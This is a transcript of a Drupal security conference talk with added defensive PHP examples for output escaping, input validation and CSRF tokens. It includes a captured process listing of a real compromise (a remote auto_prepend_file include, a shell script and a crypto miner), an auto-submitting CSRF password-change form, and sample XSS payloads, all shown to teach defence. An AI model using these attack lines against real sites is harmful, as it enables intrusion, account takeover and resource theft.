Secure Drupal, from start to finish (European Drupal Days 2015)

© Ibuildings 2014/2015 - All rights reserved

#DrupalDaysEU

Secure Drupal From start to finish

Speaker Info: Boy Baukema, Security Specialist

[email protected]
@relaxnow

• Security Specialist

• R&D Security

• Internal & External

• Security Training

• Consulting

• Security Audits

A Security what?

Gold Sponsors

/usr/sbin/apache2 -k start
 \_ /usr/sbin/apache2 -k start
     \_ /usr/local/php539/bin/php-cgi -dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -dallow_url_include=on
         \_ sh -c /tmp/sh.sh
             \_ ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker16 -p x

Such hacked. Much coins.

[20:51:04] root@bal-XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -o 'forwarded_for="[^\s,"]+?' | cut -d'"' -f2 | sort | uniq -c | sort -nr | head -30
   2112 104.130.25.XXX
   1144 37.221.162.XXX
   1067 185.13.37.XXX
   1066 77.247.181.XXX
   1058 77.109.141.XXX
   1047 5.135.158.XXX
   1042 178.175.139.XXX

HTTP Flood

• Drupal Top 3

• Secure Development Lifecycle

• The Law

The Plan

// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
  $new_keys = array();
  foreach ($data as $i => $value) {
    // This assumes that there are no other placeholders that use the same
    // name. For example, if the array placeholder is defined as :example
    // and there is already an :example_2 placeholder, this will generate

/includes/database/database.inc

Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf

/**
 * Preprocess function to replace the regular label with the
 * display label
 */
function field_display_label_preprocess_field(&$variables) {
  $field = field_info_instance(...);
  if (
    isset($field['display_label'])
    && strlen(trim($field['display_label'])) > 0
  ) {
    $variables['label'] = $field['display_label'];
  }
}

1. XSS

From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67

1. drupal_set_message

2. l

3. watchdog

Which function(s) should receive check_plain() content

Which function(s) should receive check_plain() content? The answer:

1. drupal_set_message(): yes. The message is printed as HTML, so either check_plain() it or build it with t() and an @placeholder.

2. l(): no. l() runs check_plain() on $text itself (unless 'html' => TRUE is passed), so pre-escaped text comes out double-encoded.

3. watchdog(): no. The message is a format string that is run through t() when the log is displayed; pass the untrusted value in the $variables array with an @placeholder.

In all three cases: use t('@') syntax!

$text = t("@name's blog", ['@name' => format_username($account)]);
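The two slides above (the field_display_label preprocess hook and the check_plain() quiz) share one lesson: encode exactly once, at the point where a value becomes HTML. The following is an added example, not code from the talk or from the field_display_label module. It puts the unsafe hook next to a hardened version and shows what the @, % and ! placeholder prefixes of t() do to an untrusted value. The Drupal 7 functions involved are check_plain(), format_string() and t(); the stand-ins below replicate core's escaping rules only so that the file runs outside a Drupal bootstrap (inside Drupal the real functions win). The field instance and the user name are constructed inputs, and the _unsafe/_safe function names and the $instance parameter are this example's own.

```php
<?php
// Added example, not code from the talk or from the field_display_label
// module. Stand-ins for check_plain(), format_string() and t() follow
// Drupal 7's escaping rules; they are skipped when running inside Drupal.

if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

if (!function_exists('format_string')) {
  // Core rules: @var is escaped, %var is escaped and wrapped in <em>,
  // !var is inserted raw (only for markup that is already safe).
  function format_string($string, array $args = array()) {
    foreach ($args as $key => $value) {
      switch ($key[0]) {
        case '!':
          break;
        case '@':
          $args[$key] = check_plain($value);
          break;
        case '%':
        default:
          $args[$key] = '<em class="placeholder">' . check_plain($value) . '</em>';
      }
    }
    return strtr($string, $args);
  }
}

if (!function_exists('t')) {
  function t($string, array $args = array()) {
    return format_string($string, $args);
  }
}

// Constructed stand-in for the result of field_info_instance(): the display
// label is admin-entered configuration, but it arrived through a browser,
// so it is input and may carry markup.
$instance = array(
  'label' => 'Body',
  'display_label' => 'Body <img src=x onerror="alert(1)">',
);

// Vulnerable: the label is copied raw and the field template prints it as-is.
function field_display_label_preprocess_field_unsafe(array &$variables, array $instance) {
  if (isset($instance['display_label']) && strlen(trim($instance['display_label'])) > 0) {
    $variables['label'] = $instance['display_label'];
  }
}

// Hardened: encode at the point where the value turns into HTML.
function field_display_label_preprocess_field_safe(array &$variables, array $instance) {
  if (isset($instance['display_label']) && strlen(trim($instance['display_label'])) > 0) {
    $variables['label'] = check_plain($instance['display_label']);
  }
}

$variables = array('label' => 'Body');
field_display_label_preprocess_field_unsafe($variables, $instance);
echo "unsafe: {$variables['label']}\n";  // the <img onerror> reaches the page
field_display_label_preprocess_field_safe($variables, $instance);
echo "safe:   {$variables['label']}\n";  // &lt;img src=x onerror=&quot;alert(1)&quot;&gt;

// The quiz: drupal_set_message() and watchdog() treat their message as
// HTML / a format string, so untrusted text goes in through a placeholder.
$name = 'Eve <script>alert(1)</script>';                            // constructed input
echo t("@name's blog", array('@name' => $name)), "\n";              // escaped once: correct
echo t("Blog of %name", array('%name' => $name)), "\n";             // escaped and emphasised
echo t("@name's blog", array('@name' => check_plain($name))), "\n"; // double-encoded (&amp;lt;): wrong
// l($text, $path) runs check_plain() on $text itself, so it also wants
// the raw $name rather than check_plain($name).
```

Run it with php on the command line: the third t() line shows the double-encoding you get by "being extra careful" and escaping before a function that escapes for you, which is the practical reason the quiz has no single answer of "always check_plain()".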

Filter Input: as early as possible

• $_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv

• everything from the database

• $form_state (mostly ['input'])

• arg()

• drupal_get_query_parameters()

• drupal_current_script_url()

• drupal_detect_baseurl()

• request_path()

What is input?

Sanitize:

• $id = (int) arg(1);

• $accountEnabled = (bool) arg(1);

Validate:

• Form validators

• in_array()

• mb_strlen() > 1024

• url_is_external()

• valid_url()

Filter / Sanitize / Validate
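As an added example (not code from the talk), here is one hypothetical page callback's input handling done the way the slide prescribes: cast, whitelist, length-limit and validate the moment the values arrive, before any of them reaches a query, a redirect or the page. It is plain PHP so it runs outside Drupal; in a module the values would come from arg() and drupal_get_query_parameters(), and mymodule_is_internal_path() is this example's stand-in for the job core's url_is_external() does on a ?destination= parameter. All request values below are constructed.

```php
<?php
// Added example, not from the talk. Hypothetical handler for a URL like
// mymodule/account/%/toggle?op=disable&destination=admin/people
// All names and the sample requests are this example's own.

// Hypothetical helper: TRUE only for a site-relative path, so a redirect
// target cannot be turned into an open redirect. Core's url_is_external()
// covers the same ground for Drupal paths.
function mymodule_is_internal_path($path) {
  $path = (string) $path;
  // Protocol-relative (//evil.example) and the backslash variants browsers accept.
  if ($path === '' || preg_match('#^[\\\\/]{2}#', $path)) {
    return FALSE;
  }
  // Anything with a scheme (http:, javascript:, data:) before the first slash.
  if (preg_match('#^\s*[a-z][a-z0-9+.-]*:#i', $path)) {
    return FALSE;
  }
  $parts = parse_url($path);
  return $parts !== FALSE && !isset($parts['scheme']) && !isset($parts['host']);
}

function mymodule_toggle_account_validate(array $input) {
  // Sanitize by casting: whatever string arrived, $uid is an int from here on.
  $uid = isset($input['uid']) ? (int) $input['uid'] : 0;
  if ($uid <= 0) {
    return array('error' => 'invalid account id');
  }

  // Validate against a whitelist. The third argument matters: in PHP 5 and 7
  // in_array(0, array('enable', 'disable')) is TRUE without strict mode.
  $allowed_ops = array('enable', 'disable');
  $op = isset($input['op']) ? $input['op'] : '';
  if (!in_array($op, $allowed_ops, TRUE)) {
    return array('error' => 'unknown operation');
  }

  // Free text: bound its length before it is stored or logged.
  $reason = isset($input['reason']) ? trim((string) $input['reason']) : '';
  if (mb_strlen($reason) > 1024) {
    return array('error' => 'reason too long');
  }

  // Redirect targets are validated, never trusted; fall back to a known page.
  $destination = isset($input['destination']) ? $input['destination'] : 'admin/people';
  if (!mymodule_is_internal_path($destination)) {
    $destination = 'admin/people';
  }

  return array('uid' => $uid, 'op' => $op, 'reason' => $reason, 'destination' => $destination);
}

// Constructed requests standing in for arg() and $_GET.
$requests = array(
  array('uid' => '42', 'op' => 'disable', 'reason' => 'spam', 'destination' => 'admin/people/42'),
  array('uid' => '42abc', 'op' => 'disable', 'destination' => '//evil.example/login'),
  array('uid' => '7', 'op' => 0),
  array('uid' => '-1', 'op' => 'enable'),
);
foreach ($requests as $request) {
  echo json_encode(mymodule_toggle_account_validate($request)), "\n";
}
// 1: uid 42, destination kept
// 2: uid 42 (the cast drops "abc"), destination falls back to admin/people
// 3: unknown operation (strict comparison rejects the integer 0)
// 4: invalid account id
```

The point of doing this at the top of the callback is that every later line works with values of a known type, length and vocabulary; nothing downstream has to remember which variable is still raw.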

Encode Output: as late as possible

// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,

2. Access Bypass

global $user;

if ($user->uid = 1) {
  watchdog('mymodule', request_uri());
}

A disturbance in the force

• IDE / code sniffer (coder tools)

• if (1 = $uid)

• === instead of ==

• user_uid_optional_load($uid = NULL)

Avoiding accidental assign

<form action="http://mysite.com/contact" method="post" />

3. Cross Site Request Forgery

<form action="https://www.drupal.org/user/2457520/edit" method="post">
  <input type="hidden" name="pass[pass1]" value="hacked1" />

<script>$('#contactform').submit(); </script>

=> drupal_get_token

<= drupal_valid_token

Drupal Forms to the rescue!
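Forms built through the Form API carry a form_token for authenticated users, which is what "Drupal Forms to the rescue" refers to. Hand-rolled state-changing links and handlers get nothing for free, so the pair drupal_get_token() / drupal_valid_token() has to be used by hand. The following is an added example, not code from the talk: a hypothetical "delete" link and its menu callback, where the token is bound to the exact action path. The stand-ins replicate Drupal 7's token construction (a base64url HMAC-SHA256 over the value, keyed with the session id, the site's private key and the hash salt) so the file runs without a bootstrap; the session id, private key and hash salt below are constructed values, and hash_equals() is this example's hardening of the comparison, not what core used.

```php
<?php
// Added example, not from the talk. Constructed stand-ins for what Drupal
// derives from session_id(), drupal_get_private_key() and drupal_get_hash_salt().
define('MYMODULE_DEMO_SESSION', 'sess_constructed_12345');
define('MYMODULE_DEMO_PRIVATE_KEY', 'constructed-private-key');
define('MYMODULE_DEMO_HASH_SALT', 'constructed-hash-salt');

if (!function_exists('drupal_hmac_base64')) {
  function drupal_hmac_base64($data, $key) {
    $hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));
    return strtr($hmac, array('+' => '-', '/' => '_', '=' => ''));
  }
}

if (!function_exists('drupal_get_token')) {
  // The token is tied to the browser session, so a cross-site page cannot
  // know it, and to $value, so it cannot be reused for another action.
  function drupal_get_token($value = '') {
    return drupal_hmac_base64($value, MYMODULE_DEMO_SESSION . MYMODULE_DEMO_PRIVATE_KEY . MYMODULE_DEMO_HASH_SALT);
  }
}

if (!function_exists('drupal_valid_token')) {
  function drupal_valid_token($token, $value = '') {
    // Constant-time compare (PHP >= 5.6); added hardening over a plain ==.
    return hash_equals(drupal_get_token($value), (string) $token);
  }
}

// hook_menu(): a state-changing path always gets a real access check, never TRUE.
function mymodule_menu() {
  $items['mymodule/item/%/delete'] = array(
    'page callback' => 'mymodule_item_delete',
    'page arguments' => array(2),
    'access arguments' => array('administer mymodule'),
  );
  return $items;
}

// Building the link: in Drupal this would be
//   l(t('Delete'), $path, array('query' => array('token' => drupal_get_token($path))));
function mymodule_delete_link($item_id) {
  $item_id = (int) $item_id;
  $path = "mymodule/item/$item_id/delete";
  return array('path' => $path, 'query' => array('token' => drupal_get_token($path)));
}

// The page callback. $query stands in for drupal_get_query_parameters().
function mymodule_item_delete($item_id, array $query) {
  $item_id = (int) $item_id;
  $path = "mymodule/item/$item_id/delete";
  if (!isset($query['token']) || !drupal_valid_token($query['token'], $path)) {
    return "denied: missing or wrong token for $path (return MENU_ACCESS_DENIED)";
  }
  return "deleted item $item_id";
}

$link = mymodule_delete_link(17);
echo mymodule_item_delete(17, $link['query']), "\n";  // deleted item 17
echo mymodule_item_delete(17, array()), "\n";         // denied: a forged <img src> or auto-submitted form has no token
echo mymodule_item_delete(18, $link['query']), "\n";  // denied: the token is bound to item 17
```

Two practical notes: the check has to run before anything is changed, and binding the token to the full action path (rather than a module-wide constant) is what stops a token captured for one harmless action from being replayed against another.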

• Authentication / Session

• Arbitrary Code Execution

• Denial of Service

• Information Disclosure

• Logic error

• Open Redirect

• Password Protection Bypass

• Session Fixation

• SQL Injection

• ....

4. Others

Secure Development Lifecycle

1. Education & Guidance

• Threat Assessment

• Security Requirements

2. Design time security

• Architecture Review

• Code Review

3. Security Review

4. Security Testing

The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls.

• Identify third party dependencies

• ... and follow their security mailing lists

• Make rebuilding painless.

• Make redeploying painless.

• Backup & restore from backup 'regularly'

5. Vulnerability Management

The Law

The penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment of up to two years).

Damages: the manager has the burden of proving that he did everything possible to avoid the damage, with reference to appropriate and known computer-security practice, while the victim only has to prove that damage occurred.

Misure minime di sicurezza (minimum security measures)

• Individually associated accounts

• > 8 character passwords

• Changed every 3 to 6 months

• Do not leave admin unattended

• Privileges on need to know basis

• Verify privileges at least yearly

• Update at least every 6 months

• Backup data at least weekly

Disciplinare tecnico (technical rules)

Bob's Story

Responsible Disclosure

• Know your law

• Think like an attacker

• ... but don't become one (without permission)

• Make sure white hats have a place to go

• Filter Input, Encode Output

• Train your developers

• Design with security in mind

• Review and be critical

• Trust but verify that you are secure

• Perform active automated maintenance

In summary

• http://www.slideshare.net/relaxnow/drupaldays-2015

• http://crackingdrupal.com

• http://drupalsecurityreport.com

• http://drupal.org/writing-secure-code

• http://owasp.org

• OWASP ASVS

The End